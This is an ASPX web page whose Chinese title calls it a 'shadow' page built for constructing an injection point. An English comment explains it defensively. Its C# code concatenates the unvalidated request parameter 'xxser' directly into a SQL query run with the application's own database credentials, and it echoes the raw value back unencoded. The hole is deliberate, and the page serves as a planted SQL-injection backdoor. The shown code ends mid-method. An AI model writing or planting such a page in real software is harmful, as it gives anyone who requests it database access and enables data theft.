<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">

<html xmlns="">

<head runat="server">

<!--
  Page header. The title reads, in English, roughly "Shadow ASPX page
  purpose-built for constructing an injection point".

  What the server-side script further down this page does:
    * reads the request parameter "xxser" (query string, form, cookie or
      server variable, since it goes through Request.Params);
    * concatenates that value, unquoted and unvalidated, into a SELECT
      statement;
    * runs the statement over a connection string taken from the
      application's own configuration;
    * writes the raw parameter value back into the response without
      HTML encoding.
  Judging by the title, the injectable query is the point of the page
  rather than an oversight.

  Defensive reading: whoever can request this file can run SQL with the
  database rights of the application's configured account. Finding such a
  file under a production web root is worth treating as an indicator of
  compromise or a forgotten test artifact. The safe counterpart of the
  same lookup binds the value through a SqlParameter and passes anything
  echoed through HttpUtility.HtmlEncode.
-->

<title>暗影aspx构造注射专用页面</title>

</head>

<body>

<form id="form1" runat="server">

<div>

<script language="c#" runat="server">

void page_init(object sender, EventArgs e)

{

System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();

conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();

conn.Open();

string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1

System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);

int x = command.ExecuteNonQuery();

Response.Write(i+"\n");

Response.Write(x);